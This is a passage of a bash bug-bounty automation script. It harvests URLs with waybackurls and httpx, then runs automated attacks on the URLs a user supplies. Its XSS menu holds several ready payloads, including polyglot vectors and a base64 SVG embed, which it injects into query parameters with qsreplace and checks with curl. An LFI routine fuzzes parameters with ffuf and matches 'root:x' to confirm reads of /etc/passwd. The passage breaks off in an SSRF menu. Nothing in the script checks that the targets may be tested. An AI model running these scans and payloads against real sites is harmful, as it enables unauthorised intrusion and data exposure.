124 | # Extract unique subdomains  and save to final output file
125 | echo "\033[0;36m[\033[1;32m+\033[0;36m] \033[1;33m[$]  (づ ￣ ³￣)づ Thanks for your Patience!! "
126 | ;;
127 | 
128 | 2)
129 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
130 | echo "URL Hunting..."
131 | echo "\e[5;1;91m⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
132 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⠤⢐⣒⣉⣉⣉⣉⣒⡲⢤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
133 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡤⢊⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣷⣌⡳⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
134 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⠀⠤⠤⠤⠞⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡜⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
135 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡠⢖⣩⣴⣶⣾⣿⡇⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣈⣀⣒⡒⠢⢄⡀⠀⠀⠀⠀⠀
136 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡜⣡⣿⣿⣿⣿⣿⣿⡇⢸⣿⣿⣿⣿⣿⣿⣿⣿⠹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣍⠢⡄⠀⠀⠀
137 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡼⢰⣿⣿⣿⣿⣿⣿⣿⣇⠘⣿⣿⣿⣿⣿⣿⣿⣿⠇⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡜⢆⠀⠀
138 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣈⠛⠿⣿⣿⣿⡿⠋⣰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡜⣆⠀
139 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡠⠤⠾⢡⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣦⣤⣬⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⢸⠀
140 | ⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⡠⢚⣡⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠈⡆
141 | ⠈⣟⠲⢄⡀⠀⠀⣀⠴⢋⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⣻⣶⣬⣽⣿⣿⣿⣿⣿⣿⣿⣿⠀⡇
142 | ⠀⠸⡄⣷⣬⣍⣭⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢸⠁
143 | ⠀⠀⢳⡸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⢿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢇⡎⠀
144 | ⠀⠀⠀⢣⠹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢟⣥⣶⣿⣿⣿⣶⣌⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢋⡞⠀⠀
145 | ⠀⠀⠀⠀⠳⡙⢿⣿⣿⣿⣿⣿⣿⣿⠃⣾⣿⣿⣿⣿⣿⣿⣿⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⡙⢿⣿⣿⣿⣿⣿⣿⠿⢋⡵⠋⠀⠀⠀
146 | ⠀⠀⠀⠀⠀⠈⠢⣙⠿⢿⣿⣿⣿⣿⡄⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡮⣭⣉⡭⠭⠔⠚⠁⠀⡀⠀⢰⠀
147 | ⠀⠀⠀⠀⠀⠀⠀⠈⠙⠒⠲⠭⠭⠕⢣⡘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⣱⠁⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀
148 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠀⠀⠂⠀⠳⡙⢿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢋⢧⡙⢿⣿⣿⣿⣿⣿⣿⣿⣿⠿⢋⠔⠁⠀⠀⠸⠀⠀⠘⠀⠀⠁⠀⠀⠀
149 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠢⣝⣛⠛⠛⠛⣛⣋⠥⠚⠁⠀⠉⠒⠬⢭⣛⣛⣛⣫⠭⠔⠊⠁⠀⢰⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
150 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⢀⠀⠉⢉⠉⢁⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⢰⠀⠀⢀⠀⠀⡆⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
151 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⠀⠈⠀⠀⠈⠀⠈⠀⠀⠠⠆⠀⠆⠀⠀⠀⠀⠈⠀⠀⠘⠀⠀⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀"
152 | 
153 | Target
154 | echo "\033[1;33m[?]\033[1;33m Note:\033[1;35m Please note that,finding the URLs may take some time,\n          so please refrain from canceling the running script.\n\033[1;32m[$] Your patience is appreciated.\n "
155 | echo "\033[1;35m "
156 |   
157 | read -p "Enter domains.txt file: " find_url
158 | echo "Note:\033[2;33m Please Wait, Now Script running in --Silent mode \n      all data found in url.txt file"
159 | echo ""
160 | echo "\e[5;92m Finding...\e[0m"
161 | cat $find_url | waybackurls | tee -a url1.txt 
162 | echo "\e[5;92m Finding...urls using Second method!\e[0m"
163 | cat $find_url | getallurls  | tee -a url2.txt
164 | cat  url1.txt  url2.txt | anew  all_url.txt
165 | cat all_url.txt | httpx -silent -t 100 | tee -a live_url.txt
166 | rm  url1.txt url2.txt 
167 | echo "\e[5;92m Finding Done!\e[0m"
168 | ;;
169 | 
170 | 3)
171 | 
172 | echo "Testing for XSS vulnerability...\e[5;1;97m "
173 | echo "⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣤⣤⣤⣤⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀
174 | ⠀⠀⠀⠀⠀⠀⢀⣠⣶⣿⣿⡿⠿⠿⠿⠿⢿⣿⣿⣷⣦⣄⣀⣤⣶⣶
175 | ⠀⠀⠀⠀⠀⣰⣿⣿⠿⠋⠁⠀⠀⠀⠀⠀⠀⠀⠉⠛⠿⣿⣿⣿⠟⠋
176 | ⠀⠀⠀⠀⣼⣿⡿⠃⠀⢀⣤⣾⣿⣿⣿⣿⣷⣦⣄⠀⠀⠈⠉⠀⠀⠀
177 | ⠀⠀⠀⣸⣿⡿⠁⠀⢠⣿⣿⠟⠉⠀⠈⠉⠛⢿⣿⣷⡄⠀⠀⠀⠀⠀
178 | ⠀⠀⢀⣿⣿⡇⠀⠀⣾⣿⡟⠀⠀⢀⣤⣄⠀⠀⠹⣿⣿⡄⠀⠀⠀⠀
179 | ⠀⠀⣾⣿⣿⡇⠀⠀⢻⣿⣷⡀⠀⠘⣿⣿⡇⠀⠀⣿⣿⡇⠀⠀⠀⠀
180 | ⠀⣼⣿⡿⣿⣿⡄⠀⠈⠻⣿⣿⣷⣿⣿⡿⠃⠀⢀⣿⣿⡇⠀⠀⠀⠀
181 | ⣰⣿⣿⠁⠹⣿⣿⣦⡀⠀⠈⠉⠛⠋⠉⠀⠀⣠⣾⣿⡟⠀⠀⠀⠀⠀
182 | ⣿⣿⣧⣤⣤⣬⣿⣿⣿⣶⣦⣤⣤⣤⣴⣶⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀
183 | ⠙⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀
184 | \e[0m
185 | "
186 | Target
187 | echo "\033[1;31m-------------------------------------------------\033[1;33m "
188 | read -p "[+] Please provide URL.txt file: " url_file
189 | echo "\033[0;31m-------------------------------------------------\033[0;33m "
190 | echo "{+} <sVg/oNloAd=prompt(1)//>                          [1] "
191 | echo "{?} javascript:Polyglot_payload-1                     [2] "
192 | echo "{?} javascript:Polyglot_payload-2                     [3] "
193 | echo "[$] \e[5;92mEnter Custom payload                              [4]\e[0m "
194 | echo "[+] <marquee/onstart=prompt(1)//>                     [5] "
195 | echo "[+] EMBED SVG which contains Base-64-xss Vector       [6]"
196 | echo '[+] <BODY onload!#$%&()*~+-_.,:;?@[/|\]^=prompt(1)>   [7] '
197 | echo "{$}\e[5;1;31m Get reflected Parameters[Gxss]                    [8]\e[0m"
198 | echo "\033[1;31m-------------------------------------------------\033[1;33m "
199 | 
200 | 
201 | read -p "[*] Enter your XSS payload (1-8): " xss_choice 
202 | case $xss_choice in
203 | 1)
204 |  payload="<sVg/oNloAd=prompt(1)//>"
205 | ;;
206 | 2)
207 |  payload='javascript:"/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=prompt(1)//>"'
208 | ;;
209 | 3)
210 | payload="jaVasCript:/*-/*'/*/**/(/* */oNcliCk=prompt(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=prompt(1)//>\x3e"
211 | ;;
212 | 4)
213 | echo "[!]\e[7;1;97m  Note: Only -->prompt(1) allowed in PAYLOAD!.You have to modify your Payload! \e[0m "
214 | read -p "Please add your custom Payload():- " payload
215 | ;;
216 | 
217 | 5)
218 | payload="<marquee/onstart=prompt(1)//>"
219 | ;;
220 | 6)
221 | payload="<EMBED SRC='data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+cHJvbXB0KDEpOzwvc2NyaXB0Pjwvc3ZnPg==' type='image/svg+xml' AllowScriptAccess='always'></EMBED>"
222 | ;;
223 | 7)
224 | payload="<BODY onload!#%&()*~+-_.,:;?@[/|\]^=prompt(1)>"
225 | ;;
226 | 8)
227 | echo "Note:\033[2;37m Please Ignore any Error and wait.\n      all data found in url_Reflected_params.txt file"
228 | echo "\033[1;32m\nFinding Reflected Parameters..."
229 | cat $url_file | grep "=" | Gxss -c 100 -p FUZZ  | tee -a  url_Reflected_params.txt
230 | cat url_Reflected_params.txt | sort -u | anew url_Reflected_params.txt
231 | echo "\e[5;92m \nFinding Done!\e[0m"
232 | 
233 | ;;
234 | *)
235 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
236 | echo "[!] \033[1;31mInvalid choice. Exiting..."
237 | 
238 | exit 1
239 | ;;
240 | esac
241 | echo "\e[5;92m Finding xss...\e[0m"
242 | cat $url_file | gf xss | grep '=' | qsreplace "$payload" | while read host do ; do curl --silent  "$host" | grep -qs "prompt(1)" &&
243 |  echo "$host \033[0;31m [+] \033[0;32m  Vulnerable\n"; done  | tee -a  xss.txt
244 | 
245 | cat $url_file | grep '=' | qsreplace $payload | while read host do ; do curl --silent  "$host" | grep -qs "prompt(1)" &&
246 |  echo "$host \033[0;31m [+] \033[0;32m  Vulnerable\n"; done  | anew  xss.txt
247 | echo "\e[5;92m Finding Done!\e[0m"
248 | ;;
249 | 
250 | 4)
251 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
252 | echo "⣿⣿⣷⡟⠀⠈⠏⠉⠙⢁⣤⣶⣿⠟⡘⣿⣶⣔⢄⡈⠙⢿⣿⣷⣦⡉⢝⠻⢿⣷⣦⣭⣭⣵⡶⠟⣹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
253 | ⣿⣿⣿⣧⡀⠀⠀⣠⣶⣿⣿⠟⠁⣼⠃⢿⣿⣿⣧⠻⣦⠀⠙⢿⣿⣷⣌⠻⠶⢬⣍⣛⠛⠋⠐⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
254 | ⣿⣿⣿⣿⣿⠖⣰⣿⡿⠋⠁⢀⣾⡟⠀⣯⢻⣿⣿⣷⡙⣷⡄⠀⠙⣿⣿⣦⠀⠀⠙⢿⣷⣄⠢⣤⣬⣿⣿⣻⣛⣟⣿⣿⣿⣿⣻⣿
255 | ⣿⣿⡇⣸⢁⣾⠿⠋⠀⠀⣴⣿⠟⠀⢠⠸⣆⠻⣿⣿⣿⡌⢿⣆⠀⠈⢻⣿⣧⡀⠀⠈⢻⣿⣦⣉⠉⠭⢭⣭⣭⣭⣭⣭⣭⣭⡏⢻
256 | ⡟⣿⡇⠁⠞⠁⠀⢀⣴⣾⡿⠃⠀⠀⠞⠃⢹⣦⡘⢿⣿⣿⣄⢻⣷⣄⠀⠹⣿⣷⡄⠀⠀⢻⣿⣿⡛⢒⣒⣈⣛⣛⣛⣛⣛⣛⠃⣿
257 | ⡇⢃⢃⣀⣊⣡⣴⣿⠟⠋⠀⠀⠀⣼⣿⣿⡆⠻⣿⣆⠉⡻⢿⣆⠨⠻⣧⣄⠈⠻⣿⣦⡀⠀⠻⠿⠿⠒⢈⣹⣿⣿⣿⣿⣿⣿⠀⣿
258 | ⣧⡇⡆⣭⣭⡄⠒⢂⠀⠀⠀⠀⡜⣉⠉⠀⡄⠄⠈⣻⣷⡈⠻⢿⣷⣦⡈⢿⣿⣦⣄⡉⠛⠂⠸⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⣿
259 | ⣿⡇⡇⣿⡿⠀⢰⣿⠀⠀⢠⣾⠁⣇⠀⢰⢸⣘⣄⠈⠻⢿⣄⠀⠀⠉⠉⠀⠀⠀⠁⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿
260 | ⣿⡇⡇⠟⠀⠀⠈⢁⡤⠀⢸⣿⠓⣉⣐⣀⣩⣿⣿⣦⠀⠀⠉⠂⠀⠀⠀⢄⡀⠀⠀⠀⠈⠐⠢⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
261 | ⣿⣧⡀⢀⣠⣼⠃⠘⢧⠐⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⡀⠐⢶⣤⠠⢄⣹⡐⣆⡆⣠⣤⣤⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
262 | ⣿⡟⡇⣿⣿⡏⠀⣰⣌⠷⣴⢸⣿⣿⣿⣿⣿⣿⣿⡏⢈⣿⣷⣴⣤⣿⣿⣿⡏⠘⠋⣼⣿⣿⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
263 | ⣿⣷⡇⣿⡿⠁⠀⣿⣿⠀⠀⠈⢿⣿⣿⣿⡿⠿⠿⢿⣿⡿⠿⢿⣿⣿⣿⣿⠁⠀⠀⠿⣿⣿⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
264 | ⣿⣿⡇⣿⣷⢠⣀⣿⡟⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⡋⠉⣩⣿⣿⣿⣿⠟⠁⠀⠀⠀⠀⠈⠛⠿⣾⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
265 | ⣿⣿⡇⣿⣿⢸⣿⠏⠀⢀⣶⠀⠀⠀⢨⡙⢿⣿⣿⣿⣿⣿⣿⣿⠟⡉⠀⠀⢸⣦⠀⠀⢄⠀⠀⠀⣀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
266 | ⣿⣿⡇⣿⣿⠸⠋⠀⣰⣿⠇⢀⠁⠀⠘⠛⠀⠉⠛⠿⡿⠟⣋⣴⣾⠃⠀⠀⠈⣿⣧⡀⠀⢻⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⣿
267 | ⣿⣿⡇⣿⣿⠄⠀⣸⠿⠃⠠⠊⠀⠀⠀⢂⠀⠀⠀⠀⠀⠙⣿⡿⠁⡇⠀⠀⠀⠉⢻⡇⠀⣼⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⣿
268 | ⣿⣿⡇⣿⣿⢰⡀⣿⣷⡶⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⣾⠟⣠⢇⡇⠀⠀⠀⠀⠀⢿⣦⣻⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⣿
269 | ⣿⣿⡇⣿⣿⢸⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠃⠂⠀⣤⣴⣾⠛⠈⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿
270 | ⣿⣿⡇⠿⠛⠈⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿"
271 | echo "\e[0m\033[0;31m-------------------------------------------------\033[1;33m "
272 | Target
273 | echo "Testing for LFI vulnerability..."
274 | read -p "[+] Please provide URL.txt file: " url_file
275 | # LFI
276 | echo "\e[5;92m Finding LFI...\e[0m"
277 | W=$(locate LFI-Jhaddix.txt)
278 | cat $url_file | gf lfi | grep '='|qsreplace 'FUZZ' | while read url; do ffuf -u $url -mr "root:x" -w $W ; done | tee -a LFI.txt
279 | echo "\e[5;92m Finding Done!\e[0m"
280 | ;;
281 | 
282 | 5)
283 | echo "Testing for SSRF vulnerability..."
284 | echo "\033[0;31m-------------------------------------------------\033[1;33m  "
285 | echo "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
286 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢟⣫⣵⡆⣽⡟⣿⡷⢶⣮⣍⡻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
287 | ⣿⣿⣿⣿⣿⣿⣿⡿⣫⣶⠧⡩⡃⠇⢿⠸⠟⠔⠁⠝⡻⢿⣦⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
288 | ⣿⣿⣿⣿⣿⣿⡿⡁⢉⡔⢅⣴⣶⣶⣾⣿⣿⣿⡎⣷⡹⡎⢯⡹⣮⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⣩⢵⢆⡀⣶⠖⡩⡻⣿⣿⣿⣿⣿⣿⣿
289 | ⣿⣿⣿⣿⣿⢟⡼⣱⣿⡞⣼⣿⣿⣿⣿⣿⣿⣿⣿⢸⢿⣿⡸⠛⡜⣧⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⣂⢨⣬⣬⣽⣿⣶⣦⣥⡸⣿⣿⣿⣿⣿⣿
290 | ⣿⣿⣿⣿⢏⡾⣱⣿⡿⣱⡿⣿⣿⣿⣿⣿⣿⠿⠿⠃⢸⣿⡧⢸⢸⢹⣇⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⣇⡏⣾⣿⣿⣿⣿⣿⠿⣿⡁⢻⣿⣿⣿⣿⣿
291 | ⣿⣿⣿⡟⠜⣰⣿⡿⢱⠷⣲⣶⣤⣍⣿⣿⣤⠠⠶⠅⠀⢿⣷⣌⠜⣼⣿⣎⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⢸⡇⠙⠛⢻⣿⡉⠥⠒⠺⣿⢸⣿⣿⣿⣿⣿
292 | ⣿⣿⡩⠴⢂⡿⢻⢡⢨⠡⡄⡶⢀⢸⣿⣿⣿⣠⡐⠖⠀⠀⡉⢧⠑⠨⢛⣿⠪⡻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡧⢸⠁⢀⣐⣽⣿⣷⣤⣥⣤⣯⠀⠙⣿⣿⣿⣿
293 | ⣿⡿⢣⠋⠞⡱⣡⡟⠘⣥⣎⣠⣾⣿⣿⣿⣿⣷⣶⣶⣴⡄⢷⣦⡑⡐⣙⢿⠒⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⣼⢸⣿⣿⣿⢿⢿⣿⣿⣿⡿⢀⢰⣿⣿⣿⣿
294 | ⣯⣤⡆⡞⣴⣾⡏⢀⠄⢿⣿⣿⣿⣿⡙⣟⣿⣿⣿⣿⣿⣿⠘⡜⢧⢳⡨⡕⡄⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⡇⡜⣿⣿⣿⠿⠿⢿⣿⣿⢘⢠⣿⣿⣿⣿⣿
295 | ⣿⣿⣿⠀⣿⢸⢳⢧⣛⡸⣿⣿⣿⠿⢿⣿⣿⣟⣿⣿⣿⡟⣘⡈⠂⠣⠁⠄⠸⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢀⠇⠙⢿⣷⣯⣭⣷⣿⢏⣸⣶⣿⣿⣿⣿⣿
296 | ⣿⣿⣧⣾⡄⢟⡸⡸⢻⣷⡝⢿⣿⣿⣯⣭⣽⣿⣿⡿⠏⡴⢻⡟⣀⢻⢲⢠⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣎⡀⠈⣷⣝⡻⠿⢟⣵⢿⠿⣿⣿⣿⣿⣿⣿
297 | ⣿⣿⣿⡏⣈⣆⠇⡁⠌⢹⢻⣦⢝⡻⢿⣿⣿⠟⣫⣴⡇⠁⡞⡇⠑⠸⣈⠎⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢃⡄⣧⢻⣿⣿⣿⡇⣿⢴⡸⣿⣿⣿⣿⣿
298 | ⣿⣿⣿⣿⣿⣿⣷⢫⣆⠘⢸⡻⢸⣿⣷⣮⣶⣿⣿⢫⡇⠃⣥⣶⣇⢶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠏⣾⣇⢿⡎⣿⣿⣿⢱⣿⢰⣷⠹⠿⣿⣿⣿
299 | ⣿⣿⣿⣿⣿⣿⣿⢸⣿⣿⠀⣃⡍⡝⣿⣿⣿⣿⡏⣾⣇⢁⢹⣿⣿⠸⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⣛⣫⣥⣶⣿⢸⣿⣿⡌⠿⠜⣿⡿⠾⠟⣼⣿⣧⠹⣶⣬⣝
300 | ⣿⣿⣿⣿⣿⣿⠿⢸⣿⣟⢰⠟⣄⣧⢿⢿⣿⡟⡼⡋⡃⣏⢸⣿⡿⢇⡮⣝⡻⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⣫⣶⣿⣿⣿⣿⣿⣇⣛⣛⠛⣛⡜⣷⣛⣾⠿⣸⣶⣄⢺⣥⣿⣿⣿
301 | ⣿⡿⢟⣛⣭⡶⣫⡜⢿⡃⣼⢠⣿⣿⣰⣬⡿⣰⡿⣾⢇⡿⣸⣫⣶⢣⡇⣿⣿⣷⣶⣭⣛⠿⢿⣿⣿⡿⢫⣾⣿⣿⣷⣿⣿⣿⣿⣿⣿⡇⠰⢿⣿⡜⣿⡷⣱⠟⣫⡄⣿⣿⣿⣿⣿
302 | ⣶⣾⣿⣿⣿⣿⣿⣿⣟⢡⡙⡞⣛⣛⡣⢟⠣⣛⣿⠄⡌⣾⣿⣯⣷⣿⡇⣿⣿⣿⣿⣿⡿⢟⣷⢶⣮⡐⢛⣿⢹⣿⡿⣸⣿⣿⣿⣿⣿⡇⡜⣷⢮⣝⡈⢑⣵⢏⣿⣿⢸⣿⣿⣿⣿
303 | ⣿⣿⣿⣿⣿⣿⣿⣿⠉⣿⢣⣇⢿⣿⣿⣿⣿⣿⡟⣼⣧⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡹⣿⣧⢻⣿⡜⠿⡌⣿⡇⣿⣿⣿⣿⣿⣿⢳⣷⢹⣦⡻⡇⠉⣡⣿⣿⣿⢸⣿⣿⣿⣿
304 | ⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⡚⣹⡜⣿⣿⣿⣿⠟⣼⣏⠙⡘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡹⣿⣸⣿⣷⠈⠄⡩⢃⣻⠿⠿⠿⠿⠿⢸⣿⣧⣿⣿⡆⣿⣿⣿⣿⣿⡏⠭⠭⠭⠭
305 | ⣿⣿⣿⣿⣿⣿⣿⣿⡟⢎⣴⣿⣷⡹⣿⣿⠏⣼⣿⣿⡷⢀⢹⣿⣿⣿⣿⣿⢻⣿⣿⣿⣿⣿⣧⢻⡇⣿⣿⡇⣃⠠⢐⡎⢩⣭⠩⣭⢍⢸⣿⣿⣿⣿⡇⡿⣿⣿⣿⣿⡇⢻⣿⡟⢛
306 | ⣿⣿⣿⣿⣿⣿⣿⣿⢱⣷⡍⡻⣿⣧⢻⠏⣼⣿⢟⣡⣾⣿⡎⣿⣿⣿⣿⣿⡇⠿⢟⣛⣛⡻⠿⡇⠇⣿⣿⡇⡋⠰⢸⢱⡼⡇⣇⢿⣸⠈⣿⣿⣿⣿⡇⣷⣾⣿⣿⣿⣇⣆⢿⢇⡏
307 | ⣿⣿⣿⣿⣿⣿⣿⢇⣿⣿⣷⡹⣦⣙⠇⡼⢋⣴⣿⣿⣿⣿⣿⡸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⣿⣿⣷⠇⣀⠀⣿⣇⢸⣿⠀⣿⢸⡜⢿⣿⣿⡇⣿⣿⣿⣿⣿⣿⢸⡜⢸⣿"
308 | echo "\e[0m\033[0;31m-------------------------------------------------\033[0;33m "
309 | Target
310 | 
311 | echo "\033[0;31m-------------------------------------------------\033[0;33m "
312 | echo "{*} SSRF Finding Basic method                                                    [1] "
313 | echo "{*} Check Blind ssrf in Header,Path,Host & check xss via web cache poisoning.    [2] "
